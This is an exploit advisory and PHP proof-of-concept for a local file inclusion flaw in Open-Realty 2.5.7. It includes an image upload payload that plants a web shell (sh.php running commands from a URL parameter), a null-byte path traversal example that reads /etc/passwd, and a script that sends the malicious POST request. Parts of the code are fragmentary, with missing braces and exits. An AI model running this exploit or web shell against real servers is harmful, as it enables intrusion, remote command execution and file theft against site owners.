* Exploit Title:
* Date: 2010-08-18
* Author: Nikola Petrov
* Vendor: http://open-realty.org/
* Version: 2.5.7
vulnerable: Open-Realty 2.5.7
LFI: /index.php
upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>
include the image and sh.php will be generated.
proceed with sh.php
MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
print "\n\n#########################################################################\n";
print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
print "#Date: 05.09.2009\n";
print "#########################################################################\n\n";
if($argc < 5) {
print "usage: $argv[0] host port path file [debug: 1/0]\n";
print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
$Host = $argv[1];
$Port = $argv[2];
$Path = $argv[3];
$File = $argv[4];
function HttpSend($aHost, $aPort, $aPacket) {
$Response = "";
if(!$Socket = fsockopen($aHost, $aPort)) {
print "Error connecting to $aHost:$aPort\n\n";
fputs($Socket, $aPacket);
while(!feof($Socket)) $Response .= fread($Socket, 1024);
return $Response;
$VulnRequest = "select_users_lang=". $File . "%00";
$Packet= "POST {$Path} HTTP/1.1\r\n";
$Packet .= "Host: {$Host}\r\n";
$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";
$Packet .= "$VulnRequest\n";
if($argv[5] == 1) print $Packet;
print HttpSend($Host, $Port, $Packet);